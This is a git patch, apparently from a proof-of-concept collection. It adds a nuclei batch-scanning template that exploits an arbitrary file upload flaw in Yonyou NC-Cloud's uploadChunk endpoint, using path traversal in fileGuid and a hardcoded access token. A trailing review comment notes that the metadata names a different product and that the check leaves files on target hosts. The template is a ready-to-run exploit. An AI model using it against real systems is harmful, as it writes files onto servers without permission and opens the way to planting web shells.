From 57db70681e492493302f65fd9a2ae599bafeea45 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 24 Nov 2023 19:50:34 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E7=94=A8=E5=8F=8BNC-Cloud=20uploadChu?= =?UTF-8?q?nk=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友NC-Cloud uploadChunk 任意文件上传漏洞.md | 42 ++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/用友NC-Cloud uploadChunk 任意文件上传漏洞.md b/用友NC-Cloud uploadChunk 任意文件上传漏洞.md index 56810aa..06894dc 100644 --- a/用友NC-Cloud uploadChunk 任意文件上传漏洞.md +++ b/用友NC-Cloud uploadChunk 任意文件上传漏洞.md @@ -23,3 +23,45 @@ Content-Disposition: form-data; name="file"; filename="test.txt" 文件上传路径访问 /nccloud/test.txt + +## nuclei批量yaml文件 +```yaml +id: yonyou_NCCloud_uploadChunk_upload + +info: + name: 用友NC Cloud uploadChunk任意文件上传漏洞 + author: afan + severity: critical + tags: yonyou,changjietong,bjxsec,yonyouoa + description: fofa app="畅捷通-TPlus" +variables: + file_name: "{{to_lower(rand_text_alpha(8))}}.txt" + file_content: "{{to_lower(rand_text_alpha(26))}}" +requests: + - raw: + - | + POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9 + accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ + Content-Length: 153 + + --024ff46f71634a1c9bf8ec5820c26fa9 + Content-Disposition: form-data; name="file"; filename="{{file_name}}" + + {{file_content}} + --024ff46f71634a1c9bf8ec5820c26fa9-- + + - | + GET /nccloud/{{file_name}} HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: word + words: + - "{{file_content}}" + part: body + + +```
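Review bot: The `info` block of the added template describes a different product than the one it tests: `name` says 用友NC Cloud uploadChunk, while `description` holds a search query for `畅捷通-TPlus` and `tags` lists `changjietong` and `yonyouoa`. Anyone filtering or triaging results by metadata will mis-attribute the finding. `description` should state what a match means (a file written through the `fileGuid` parameter is readable back under `/nccloud/`), and the search query, if kept, belongs under `metadata`. The check also leaves `{{file_name}}` in the web root of every host it confirms, and nothing removes it. The template should therefore carry the `intrusive` tag and a comment such as `# writes a marker file under /nccloud/; remove it after verification`, so operators know to clean up and responders can recognise the artefact.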